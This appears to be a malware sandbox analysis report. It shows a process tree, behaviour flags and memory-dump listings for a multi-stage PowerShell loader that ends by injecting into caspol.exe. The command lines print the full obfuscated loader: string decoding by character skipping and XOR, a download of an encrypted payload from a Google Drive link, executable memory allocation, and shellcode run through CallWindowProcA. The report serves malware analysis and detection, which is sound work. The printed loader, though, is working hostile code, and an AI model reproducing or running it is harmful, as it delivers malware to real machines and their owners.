tuHToTFiBFr Di'TrFAd6So8In0UnBGl7LaAUe1MuAFe6stBDe7SuELi1SiFUn2KnEReFMoFIn2FlFTa6VaAGr1ReBSa9KoAPa7MlBBr7JoASp1SpABu2SeFSyCPr9LeBYtBThCRaADi4UnBChDShBHa9BoBPo7CoFUdACo8Me9Id9SyBPrBThCNeADa6fi8Co2TrABr6UnADe0Ci8FoFHnESi8GrEMa8Gr8Va8FiBSt7BdAGe0KrBSpDHoFUdEhuFFi2FrEMa4brEGe6FoEaf3ReFStEVaFBo2ChEma2SeAReAEnETu1GaEEk2SkESv2InELy2PhFRoEUnFEg2TeEOv2MaABrAPrESo6MoESy2AfFBaBTu'Cr;Pe&ar(br`$BeYFraanrAndDoino7Tr)Or sp`$HovPeiCaeGetVr7Fa;Re`$BrvFriBieHetSt8No Re=Ka UnHDaTMoBRu Sp'PiFTr6Re8An0SmBKo7ReBPe3PtBSrEStBBl0AnBSy7SvBHy6dyBNe7SlBSeFHoFst2PeESiFSyFSk2VeFSn6HuAIm1PoBIv9AdADi7BoBCa7AdACo1FoAMe2VuFFoCcr9AnBDoBTrCarAMo4PuBVrDLiBWe9KoBPl7LeFHoAFo8Ja9Bo9PlBErBNeCViABe6El8Kr2FoANo6HyABr0Bo8HeFRiESa8UnETr8Ps8Re8CoBDa7MaAQu0SeBKrDOrFNoERiFKv2ObEEe4KoEAl7PaETr0VaEBr6GlEPu3SuEMo2SyEKaASuERaAAkFSoEkuFRu2SkESi2FaAtyAPrEWh1GrESl2GaEHd2OcEud2DiFBrEHaFTh2DeEUn2AfAEfAraEMa6GaFAnBRe'Ha;Fl&ko(Sa`$BaYSnaBirPrdHeiSk7Ha)Ba Fl`$VivBaiMeeSvtJa8Io;Sa`$YaSIttOvrEvmTreTrrBaeSlnDisKa1Mi3Al9Bo0Br1Bi Me=Un Nr'InhTitgatWipSksKu:La/ac/TrdCerIniSuvWoeOp.SagHyoOnonagSelVeepa.IncDeoBlmno/InuSpcPi?MeeRaxgaprooNorPrtWh=IsdFooHowConUnlSwoseaHvdTe&PriindAg=Bo1SpdTrzAigRe1Hy9Mo2Bo6mepbenMaDFimLe9Je3An5MadSe_DrCOpmVi4apTBlRDrEReqDazGuXBr4KljHa7SuoSlxInJsilKo'mu;Ju`$miSNitTirInmSheAnrNaeHanStsjo1pe3Sw9Ta0He0Ha br=Ha UnHNoTKaBKo He'IcFRe6Br9NoDhaATi4HaBDe7FiACo0ChAEx1foABu2CaBSe7FoBFeCHaBne6KoBDe7SyFCa2InEAtFMoFUn2AmFPoAss9GrCWaBpr7StARe5KaFPiFAf9UeDSuBDu0SaBWa8BiBHe7GoBBe1GlAFe6ToFMa2Wr9raCReBUd7TrAgr6CaFGeCal8Cl5LeBBa7ClBAl0rh9So1SyBLuEHuBSmBpaBKi7SpBafCSkAKo6AnFGeBSkFBeCPe9Bi6SnBTrDDeABo5InBMiCAsBDrEEnBKaDTyBSu3AdBCl6Fi8Ne1KaAPr6FiAIn0MaBMaBSmBSkCUdBCu5SyFdoAInFCy6Bi8Ex1agAUn6huADa0SpBCoFPaBIn7HeAsn0jaBFo7UdBSwCSkANa1WiEGo3VaEPa1AmEInBDeEHa2ThESa3SkFlaBBu'Ne;Ta`$ApvPaiFoeFotsm8Ph Sw=Av KaHDrTTiBPy As'TrFja6Pu8Du0SmBim7KvARi1FaASu6enBPe7MeEBi0CoEChFUnFIn6AvBRe7SkBViCBiADi4CyEUn8AfBVo3FuASp2ElAPh2EmBVe6ReBDk3IsATu6StBPr3Fo'sk;Co&St(Ka`$SaYChaKorChdBuiFn7He)se Wa`$cavraiTaeArtFr8Vr;Bi`$ByRLieDesKatReeSo2st=Tr`$LeRAteHesEntBeere2Su+ba'Kr\NoACapUdoKosUntGeiColUdsMo.KodMiaNotBo'ch;Be`$TaOEkvNueInrHysRapWaeTrnAadFaeSt=Ko'fi'Aa;BeiKrfSa le(Su-SpnHuonotAm(NeTKueCcsLetDi-KoPCraChtRohMa By`$fiRWaeVisoptTresy2Ud)gr)Be Un{SmwFrhPsiDilGreAv Fr(Va`$UdOTrvNyeRirAlsTrpAfeStnPadSoeTo Ld-MoeChqLa An'Sn'Va)Bd Es{pa&Bi(Pe`$LiYlaaAsrCudAfigr7Or)Ek Ma`$AfSSetForkamSeeArrLaeKanUnsBu1Sy3Im9ce0Ae0hu;AlSBotSlaParbatCi-InSBalUseTreBepVo Se5In;Fo}DeSReeSotCo-StCAsoLgnEltKaeStnpltCi Fo`$EmRUdeAtsbetBoeca2Bi ha`$PrOPivScefarPosCapOpeScnUbdPreSa;Mo}Ga`$LoOCavhueNarSmsMapAteFlnUndReeBr Ko=st snGMaeOrtSt-FrCLaoPlndatKreOpnLetVa Dr`$EkRMiePhsHatIneSe2Be;Op`$QuvTeiAneNstBe9Io Po=Ki UdHStTTrBHu ba'BuFPe6PaARy4OtBVeBTuBOn7BrAOs6DoFsl2AbECiFPrFAn2Tr8He9Pe8Sv1SkALeBLsAAr1AbALa6BoBSo7ReBKeFbuFBlCOr9Fo1UhBUpDDuBDiCSaASy4OoBRe7BrARe0ScAOp6Ki8ReFHoEFo8InESc8na9Pa4UnABl0UdBWlDDoBExFDi9St0DeBFr3FiAUb1biBEl7RaERe4riERe6Mi8Aa1AlAEu6BuAHe0KyBSiBUnBSlCDaBDe5OsFAfAZiFIn6Bu9MrDCeAUd4PaBSp7UnAHa0TiARe1reAAl2SiBFe7HaBUnCGaBDr6kuBFr7InFAdBJo'Pe;Re&Ta(Ri`$ceYHyaTvrcadViiSp7No)mi Un`$ThvWeiSoeSttFo9ko;un`$inORevEveKarelsBapInePanHadBieSa0Fi Sv=Fr waHmuTOlBSt Ud'Ni8Ov9Ko8Tr1TrAsmBDiAan1UnADe6NoBSv7EtBMeFCaFOvCPr8Ex0grASn7DiBElCUnAEx6brBBeBWiBSuFLoBSt7StFNoCSy9NgBLyBvaCChADo6SwBEn7SuASt0LoBbeDUpAAn2Po8Ac1ChBRe7prAMa0PrAIg4CeBUnBBaBUn1ovBGa7PrAUn1DiFbrCDe9unFTiBTr3UpAPr0RuAHa1KaBKnAHaBBi3BoBObEre8HaFReEAu8ZeEfe8Od9Re1AsBbeDGrACo2WaAOfBOdFHeABrFBe6KoASl4AmBCoBSlBSu7FiAUn6BaFCaEUdFmi2HoEUn2LeFDeEAfFSk2EnFFo2TaFRe6Th8De0CyBTw7HeACo1HiAWo6SeBhu7PeEKn1GaFAeEEpFVa2BiECa4PeESt6ToEPa3CaFleBVe'No;Ba&En(Pi`$BoYSuaForSkdSuiBe7Am)Er No`$giOJovVoedurtrsBapOeeAunWodfoest0En;Sl`$PhHNeiFeeCrrKn1In4Ve7Ti=Af`$LyvTriVaeMotFe.SacOvoGuuVinlatUn-Co6Pa4Fo1Sa;ps`$trOBavReebarEgsJipPeeGenstdUnedo1Br Hy=Sw SeHJoTEnBTi Un'Un8Ha9Ce8Mo1UnAKeBKnAhi1SrAAn6PrBOr7OvBStFboFWaCsp8Ex0MaAFi7fiBRuCReAFl6OvBReBCoBPeFdiBTa7HeFSoCBj9OpBGaBReCKrASe6WaBHa7MaATi0UnBBrDMuABr2Di8Pr1ShBHy7UnAGe0LeAun4StBKoBreBTi1SiBTi7FeAWr1UhFveCJr9VaFLiBSk3SpAAf0guABl1heBLoAExBDi3BiBSyEGu8DiFBeEsa8ToEPr8In9Op1LeBKaDToARe2PrADiBInFEgABaFFo6HaAUn4EcBTrBDiBCl7StAPn6EpFUrEUnFUn2EqESp4NaECe6InEgo3DaFsoEWiFSu2StFGo6De8Mi0SaBTr7BiBQu3PrBMaEPrBfi0SaBUn7trBsp6StBTr7AbBskFYdFOxEjaFCh2VaFFu6Sy9SoAEkBSoBKoBRu7SpAEn0CaESp3opEDi6AaEFo5DuFFuBVa'tr;Si&Sa(Sl`$QuYAcahorDidStiSo7Un)Bi tr`$meOEnvdaeHirBrsUnpYaePrnFydokeDi1Un;Bi`$HaOBrvAdeperfasCapMieLinSudRieSy2Co Ke=Su ExHReTVoBGe Se'FlFAr6Eu8ta1PoAGu6KoATe0PuBDiDSoBNa5PnBMi3MoFSp2LaEUbFJaFOp2Om8Mi9Tu8Ct1AnADoBSqAco1DeADg6BeBMe7EuBudFAlFBoCPn8Ps0CaASt7ReBCoCCoASt6KoBboBGaBInFPhBTa7StFReCNo9BaBPrBSkCAcAKn6NoBav7KvABr0PaBNdDFlAOs2El8Ba1MaBDo7AmAPa0BaAre4UnBobBQuBBe1SlBLa7ThATi1KlFKrCBe9UnFPeBCa3MaAFo0niAen1PrBmuASkBda3LnBLiERu8RuFKrEVi8MoEne8Ox9Lo5ScBNo7KuAme6An9St6SuBCo7CoBFlEMaBPe7AmBIn5ReBRe3FuARe6VeBDy7De9Ba4ReBLaDKaAAu0Fa9Fo4urAwo7UdBHaCMoBSe1FaATi6PoBBrBhyBOuDTiBFoCTh8No2SiBcoDUnBAfBEfBScCshAFo6SuBSt7tkAAf0VaFBeAExFNoABaBRu4BuBIm9SoAHa2ShFNo2FjFFr6Pi8Sl0MaACr7ArBTe0CaBSm7OcBbe4OrBPu3SiBSt1BiADe6StFTw2FoFPh6Di9MaDudASa4OoBEx7SpAPo0CiAIn2FoFDoBDeFFlEReFPe2CoFMoACo9Ve5Tr9De6As8Co6DeFPe2Gu9Co2SeFAtATa8Ri9Fo9MoBAfBMnCSaABu6Do8Ze2BaARe6ArARa0Ko8AlFHaFReEAfFOv2Un8Co9kd9BaBRuBTrCDrAUl6Pe8Um2GaANe6EpANa0Gr8TiFNiFSpEHaFgy2na8So9Ud9HaBEnBFlCMaAIn6Ja8St2KoAPu6InAAf0Te8SkFStFPsESoFRe2Fi8Cr9co9HoBSkBLfCBeATr6Ce8Be2MyABl6PoAPr0In8PiFPrFunEMyFAl2Ra8Ly9En9KvBnoBKrCAmAPh6te8Fo2GrALy6JaASy0Re8TiFFaFNaBUbFSo2FiFExARu8La9ty9LaBVlBSpCGaAUn6Im8Ha2akAPo6OrAGa0Gr8TrFGtFRuBidFTrBGrFLoBFl'Cr;Ge&Bo(Jv`$OuYOvaHorTudSiiOp7An)Un Sk`$SuOpavDoeMorCasBopDeeTrnIndGleIn2Fo;Fr`$hyOSmvSceParShsUnpHoeTenEmdVuePa3Fr St=Pa UnHFoTPaBTa Si'LaFDe6Im8Pr1BaAse6UnAek0KaBKaDBrBBi5stBco3ViFUdCCo9BoBFaBEtCspAad4HaBUnDUnBAu9DoBCo7OvFIdAAcFOf6Ha8Ca0ilBAf7MeAOp1ToAUn6FuBba7PrEFo1AlFDuESrFFo6Sm8Re0coBTe7AnBEx3FlBLaEReBUn0InBUp7AgBLg6FrBMa7AdBHeFNyFSoEPrFRo6Fr8Br6PaAMo5ExBOvBStBdr1AkBRe9KiAIn2HoBRaEFoAAu7AkFReEMeEDu2StFOcEShEVe2PrFInBUn'Th;Gl&Me(Di`$ReYInaParRadbliAs7Un)In ve`$ToOBrvFoeWarKosSepvaeThnXvdMieCa3Ka#St;""";Function Overspende9 { param([String]$uegennytti); For($Mendicplant216=2; $Mendicplant216 -lt $uegennytti.Length-1; $Mendicplant216+=(2+1)){$Strmerens139 = $Strmerens139 + $uegennytti.Substring($Mendicplant216, 1)}; $Strmerens139;}$Bortska0 = Overspende9 'CaIGdEExXPr ';$Bortska1= Overspende9 $Ligh;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Bortska1 ;}else{&$Bortska0 $Bortska1;}"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$uegennytti); $Eksam = ''; Write-Host $Eksam; Write-Host $Eksam; Write-Host $Eksam; $Unhasti = New-Object byte[] ($uegennytti.Length / 2); For($Mendicplant216=0; $Mendicplant216 -lt $uegennytti.Length; $Mendicplant216+=2){ $Unhasti[$Mendicplant216/2] = [convert]::ToByte($uegennytti.Substring($Mendicplant216, 2), 16); $Unhasti[$Mendicplant216/2] = ($Unhasti[$Mendicplant216/2] -bxor 210); } [String][System.Text.Encoding]::ASCII.GetString($Unhasti);}$polarisati0=HTB '81ABA1A6B7BFFCB6BEBE';$polarisati1=HTB '9FBBB1A0BDA1BDB4A6FC85BBBCE1E0FC87BCA1B3B4B79CB3A6BBA4B79FB7A6BABDB6A1';$polarisati2=HTB '95B7A682A0BDB193B6B6A0B7A1A1';$polarisati3=HTB '81ABA1A6B7BFFC80A7BCA6BBBFB7FC9BBCA6B7A0BDA281B7A0A4BBB1B7A1FC9AB3BCB6BEB780B7B4';$polarisati4=HTB 'A1A6A0BBBCB5';$polarisati5=HTB '95B7A69FBDB6A7BEB79AB3BCB6BEB7';$polarisati6=HTB '808681A2B7B1BBB3BE9CB3BFB7FEF29ABBB6B790AB81BBB5FEF282A7B0BEBBB1';$polarisati7=HTB '80A7BCA6BBBFB7FEF29FB3BCB3B5B7B6';$polarisati8=HTB '80B7B4BEB7B1A6B7B696B7BEB7B5B3A6B7';$polarisati9=HTB '9BBC9FB7BFBDA0AB9FBDB6A7BEB7';$Yardi0=HTB '9FAB96B7BEB7B5B3A6B786ABA2B7';$Yardi1=HTB '91BEB3A1A1FEF282A7B0BEBBB1FEF281B7B3BEB7B6FEF293BCA1BB91BEB3A1A1FEF293A7A6BD91BEB3A1A1';$Yardi2=HTB '9BBCA4BDB9B7';$Yardi3=HTB '82A7B0BEBBB1FEF29ABBB6B790AB81BBB5FEF29CB7A581BEBDA6FEF284BBA0A6A7B3BE';$Yardi4=HTB '84BBA0A6A7B3BE93BEBEBDB1';$Yardi5=HTB 'BCA6B6BEBE';$Yardi6=HTB '9CA682A0BDA6B7B1A684BBA0A6A7B3BE9FB7BFBDA0AB';$Yardi7=HTB '9B978A';$Yardi8=HTB '8E';$Rubefact=HTB '87819780E1E0';$Overp=HTB '91B3BEBE85BBBCB6BDA582A0BDB193';function fkp {Param ($Deysosp, $Emanatis) ;$viet0 =HTB 'F69AB7AAB3B7F2EFF2FA8993A2A296BDBFB3BBBC8FE8E891A7A0A0B7BCA696BDBFB3BBBCFC95B7A693A1A1B7BFB0BEBBB7A1FAFBF2AEF285BAB7A0B7FF9DB0B8B7B1A6F2A9F2F68DFC95BEBDB0B3BE93A1A1B7BFB0BEAB91B3B1BAB7F2FF93BCB6F2F68DFC9EBDB1B3A6BBBDBCFC81A2BEBBA6FAF68BB3A0B6BBEAFB89FFE38FFC97A3A7B3BEA1FAF6A2BDBEB3A0BBA1B3A6BBE2FBF2AFFBFC95B7A686ABA2B7FAF6A2BDBEB3A0BBA1B3A6BBE3FB';&($Yardi7) $viet0;$viet5 = HTB 'F681B9A0BBB6A6F2EFF2F69AB7AAB3B7FC95B7A69FB7A6BABDB6FAF6A2BDBEB3A0BBA1B3A6BBE0FEF28986ABA2B7898F8FF292FAF6A2BDBEB3A0BBA1B3A6BBE1FEF2F6A2BDBEB3A0BBA1B3A6BBE6FBFB';&($Yardi7) $viet5;$viet1 = HTB 'A0B7A6A7A0BCF2F681B9A0BBB6A6FC9BBCA4BDB9B7FAF6BCA7BEBEFEF292FA8981ABA1A6B7BFFC80A7BCA6BBBFB7FC9BBCA6B7A0BDA281B7A0A4BBB1B7A1FC9AB3BCB6BEB780B7B48FFA9CB7A5FF9DB0B8B7B1A6F281ABA1A6B7BFFC80A7BCA6BBBFB7FC9BBCA6B7A0BDA281B7A0A4BBB1B7A1FC9AB3BCB6BEB780B7B4FAFA9CB7A5FF9DB0B8B7B1A6F29BBCA682A6A0FBFEF2FAF69AB7AAB3B7FC95B7A69FB7A6BABDB6FAF6A2BDBEB3A0BBA1B3A6BBE7FBFBFC9BBCA4BDB9B7FAF6BCA7BEBEFEF292FAF696B7ABA1BDA1A2FBFBFBFBFEF2F697BFB3BCB3A6BBA1FBFB';&($Yardi7) $viet1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Pension,[Parameter(Position = 1)] [Type] $Mendic = [Void]);$viet2 = HTB 'F680B7A1A7A0A0F2EFF28993A2A296BDBFB3BBBC8FE8E891A7A0A0B7BCA696BDBFB3BBBCFC96B7B4BBBCB796ABBCB3BFBBB193A1A1B7BFB0BEABFAFA9CB7A5FF9DB0B8B7B1A6F281ABA1A6B7BFFC80B7B4BEB7B1A6BBBDBCFC93A1A1B7BFB0BEAB9CB3BFB7FAF6A2BDBEB3A0BBA1B3A6BBEAFBFBFEF28981ABA1A6B7BFFC80B7B4BEB7B1A6BBBDBCFC97BFBBA6FC93A1A1B7BFB0BEAB90A7BBBEB6B7A093B1B1B7A1A18FE8E880A7BCFBFC96B7B4BBBCB796ABBCB3BFBBB19FBDB6A7BEB7FAF6A2BDBEB3A0BBA1B3A6BBEBFEF2F6B4B3BEA1B7FBFC96B7B4BBBCB786ABA2B7FAF68BB3A0B6BBE2FEF2F68BB3A0B6BBE3FEF28981ABA1A6B7BFFC9FA7BEA6BBB1B3A1A696B7BEB7B5B3A6B78FFB';&($Yardi7) $viet2;$viet3 = HTB 'F680B7A1A7A0A0FC96B7B4BBBCB791BDBCA1A6A0A7B1A6BDA0FAF6A2BDBEB3A0BBA1B3A6BBE4FEF28981ABA1A6B7BFFC80B7B4BEB7B1A6BBBDBCFC91B3BEBEBBBCB591BDBCA4B7BCA6BBBDBCA18FE8E881A6B3BCB6B3A0B6FEF2F682B7BCA1BBBDBCFBFC81B7A69BBFA2BEB7BFB7BCA6B3A6BBBDBC94BEB3B5A1FAF6A2BDBEB3A0BBA1B3A6BBE5FB';&($Yardi7) $viet3;$viet4 = HTB 'F680B7A1A7A0A0FC96B7B4BBBCB79FB7A6BABDB6FAF68BB3A0B6BBE0FEF2F68BB3A0B6BBE1FEF2F69FB7BCB6BBB1FEF2F682B7BCA1BBBDBCFBFC81B7A69BBFA2BEB7BFB7BCA6B3A6BBBDBC94BEB3B5A1FAF6A2BDBEB3A0BBA1B3A6BBE5FB';&($Yardi7) $viet4;$viet5 = HTB 'A0B7A6A7A0BCF2F680B7A1A7A0A0FC91A0B7B3A6B786ABA2B7FAFB';&($Yardi7) $viet5 ;}$Monograms = HTB 'B9B7A0BCB7BEE1E0';$viet6 = HTB 'F6A1B9A7B7A1A2F2EFF28981ABA1A6B7BFFC80A7BCA6BBBFB7FC9BBCA6B7A0BDA281B7A0A4BBB1B7A1FC9FB3A0A1BAB3BE8FE8E895B7A696B7BEB7B5B3A6B794BDA094A7BCB1A6BBBDBC82BDBBBCA6B7A0FAFAB4B9A2F2F69FBDBCBDB5A0B3BFA1F2F68BB3A0B6BBE6FBFEF2FA959686F292FA899BBCA682A6A08FFEF289879BBCA6E1E08FFEF289879BBCA6E1E08FFEF289879BBCA6E1E08FFBF2FA899BBCA682A6A08FFBFBFB';&($Yardi7) $viet6;$Twickplu = fkp $Yardi5 $Yardi6;$viet7 = HTB 'F680B7A1A6B7E1F2EFF2F6A1B9A7B7A1A2FC9BBCA4BDB9B7FA899BBCA682A6A08FE8E888B7A0BDFEF2E4E6E3FEF2E2AAE1E2E2E2FEF2E2AAE6E2FB';&($Yardi7) $viet7;$viet8 = HTB 'F680B7B3BEB0B7B6B7BFF2EFF2F6A1B9A7B7A1A2FC9BBCA4BDB9B7FA899BBCA682A6A08FE8E888B7A0BDFEF2E4E7E0E6E3E2EAEAFEF2E2AAE1E2E2E2FEF2E2AAE6FB';&($Yardi7) $viet8;$Strmerens13901 = 'https://drive.google.com/uc?export=download&id=1dzg1926pnDm935d_Cm4TREqzX4j7oxJl';$Strmerens13900 = HTB 'F69DA4B7A0A1A2B7BCB6B7F2EFF2FA9CB7A5FF9DB0B8B7B1A6F29CB7A6FC85B7B091BEBBB7BCA6FBFC96BDA5BCBEBDB3B681A6A0BBBCB5FAF681A6A0BFB7A0B7BCA1E3E1EBE2E3FB';$viet8 = HTB 'F680B7A1A6B7E0EFF6B7BCA4E8B3A2A2B6B3A6B3';&($Yardi7) $viet8;$Reste2=$Reste2+'\Apostils.dat';$Overspende='';if (-not(Test-Path $Reste2)) {while ($Overspende -eq '') {&($Yardi7) $Strmerens13900;Start-Sleep 5;}Set-Content $Reste2 $Overspende;}$Overspende = Get-Content $Reste2;$viet9 = HTB 'F6A4BBB7A6F2EFF28981ABA1A6B7BFFC91BDBCA4B7A0A68FE8E894A0BDBF90B3A1B7E4E681A6A0BBBCB5FAF69DA4B7A0A1A2B7BCB6B7FB';&($Yardi7) $viet9;$Overspende0 = HTB '8981ABA1A6B7BFFC80A7BCA6BBBFB7FC9BBCA6B7A0BDA281B7A0A4BBB1B7A1FC9FB3A0A1BAB3BE8FE8E891BDA2ABFAF6A4BBB7A6FEF2E2FEF2F2F680B7A1A6B7E1FEF2E4E6E3FB';&($Yardi7) $Overspende0;$Hier147=$viet.count-641;$Overspende1 = HTB '8981ABA1A6B7BFFC80A7BCA6BBBFB7FC9BBCA6B7A0BDA281B7A0A4BBB1B7A1FC9FB3A0A1BAB3BE8FE8E891BDA2ABFAF6A4BBB7A6FEF2E4E6E3FEF2F680B7B3BEB0B7B6B7BFFEF2F69ABBB7A0E3E6E5FB';&($Yardi7) $Overspende1;$Overspende2 = HTB 'F681A6A0BDB5B3F2EFF28981ABA1A6B7BFFC80A7BCA6BBBFB7FC9BBCA6B7A0BDA281B7A0A4BBB1B7A1FC9FB3A0A1BAB3BE8FE8E895B7A696B7BEB7B5B3A6B794BDA094A7BCB1A6BBBDBC82BDBBBCA6B7A0FAFAB4B9A2F2F680A7B0B7B4B3B1A6F2F69DA4B7A0A2FBFEF2FA959686F292FA899BBCA682A6A08FFEF2899BBCA682A6A08FFEF2899BBCA682A6A08FFEF2899BBCA682A6A08FFEF2899BBCA682A6A08FFBF2FA899BBCA682A6A08FFBFBFB';&($Yardi7) $Overspende2;$Overspende3 = HTB 'F681A6A0BDB5B3FC9BBCA4BDB9B7FAF680B7A1A6B7E1FEF680B7B3BEB0B7B6B7BFFEF686A5BBB1B9A2BEA7FEE2FEE2FB';&($Yardi7) $Overspende3#"3⤵
- Blocklisted process makes network request
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"4⤵
- Checks QEMU agent file
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3512 -s 21805⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3512 -ip 35121⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/928-132-0x0000000000000000-mapping.dmp
-
memory/3512-168-0x0000000077BF0000-0x0000000077D93000-memory.dmpFilesize
1.6MB
-
memory/3512-160-0x0000000000401000-0x000000000062B000-memory.dmpFilesize
2.2MB
-
memory/3512-152-0x0000000000000000-mapping.dmp
-
memory/3512-167-0x00007FFF43ED0000-0x00007FFF440C5000-memory.dmpFilesize
2.0MB
-
memory/3512-166-0x00000000239A0000-0x00000000239AA000-memory.dmpFilesize
40KB
-
memory/3512-165-0x0000000024310000-0x00000000243A2000-memory.dmpFilesize
584KB
-
memory/3512-162-0x0000000000400000-0x0000000000430000-memory.dmpFilesize
192KB
-
memory/3512-169-0x0000000077BF0000-0x0000000077D93000-memory.dmpFilesize
1.6MB
-
memory/3512-170-0x0000000000BA0000-0x00000000049D8000-memory.dmpFilesize
62.2MB
-
memory/3512-159-0x0000000000400000-0x000000000062B000-memory.dmpFilesize
2.2MB
-
memory/3512-158-0x0000000077BF0000-0x0000000077D93000-memory.dmpFilesize
1.6MB
-
memory/3512-157-0x0000000077BF0000-0x0000000077D93000-memory.dmpFilesize
1.6MB
-
memory/3512-156-0x00007FFF43ED0000-0x00007FFF440C5000-memory.dmpFilesize
2.0MB
-
memory/3512-154-0x0000000000BA0000-0x00000000049D8000-memory.dmpFilesize
62.2MB
-
memory/4492-141-0x0000000005D90000-0x0000000005DF6000-memory.dmpFilesize
408KB
-
memory/4492-143-0x0000000007DE0000-0x000000000845A000-memory.dmpFilesize
6.5MB
-
memory/4492-149-0x0000000008460000-0x000000000C298000-memory.dmpFilesize
62.2MB
-
memory/4492-150-0x00007FFF43ED0000-0x00007FFF440C5000-memory.dmpFilesize
2.0MB
-
memory/4492-151-0x0000000077BF0000-0x0000000077D93000-memory.dmpFilesize
1.6MB
-
memory/4492-147-0x000000000C2A0000-0x000000000C844000-memory.dmpFilesize
5.6MB
-
memory/4492-153-0x0000000077BF0000-0x0000000077D93000-memory.dmpFilesize
1.6MB
-
memory/4492-146-0x00000000074B0000-0x00000000074D2000-memory.dmpFilesize
136KB
-
memory/4492-155-0x0000000077BF0000-0x0000000077D93000-memory.dmpFilesize
1.6MB
-
memory/4492-145-0x0000000007760000-0x00000000077F6000-memory.dmpFilesize
600KB
-
memory/4492-144-0x00000000051F0000-0x000000000520A000-memory.dmpFilesize
104KB
-
memory/4492-136-0x0000000000000000-mapping.dmp
-
memory/4492-142-0x0000000006480000-0x000000000649E000-memory.dmpFilesize
120KB
-
memory/4492-140-0x0000000005660000-0x00000000056C6000-memory.dmpFilesize
408KB
-
memory/4492-139-0x00000000055B0000-0x00000000055D2000-memory.dmpFilesize
136KB
-
memory/4492-163-0x0000000008460000-0x000000000C298000-memory.dmpFilesize
62.2MB
-
memory/4492-137-0x0000000002B40000-0x0000000002B76000-memory.dmpFilesize
216KB
-
memory/4492-138-0x00000000056F0000-0x0000000005D18000-memory.dmpFilesize
6.2MB
-
memory/4932-164-0x00007FFF25790000-0x00007FFF26251000-memory.dmpFilesize
10.8MB
-
memory/4932-148-0x00007FFF25790000-0x00007FFF26251000-memory.dmpFilesize
10.8MB
-
memory/4932-135-0x00007FFF25790000-0x00007FFF26251000-memory.dmpFilesize
10.8MB
-
memory/4932-134-0x00000182F8840000-0x00000182F8862000-memory.dmpFilesize
136KB
-
memory/4932-133-0x0000000000000000-mapping.dmp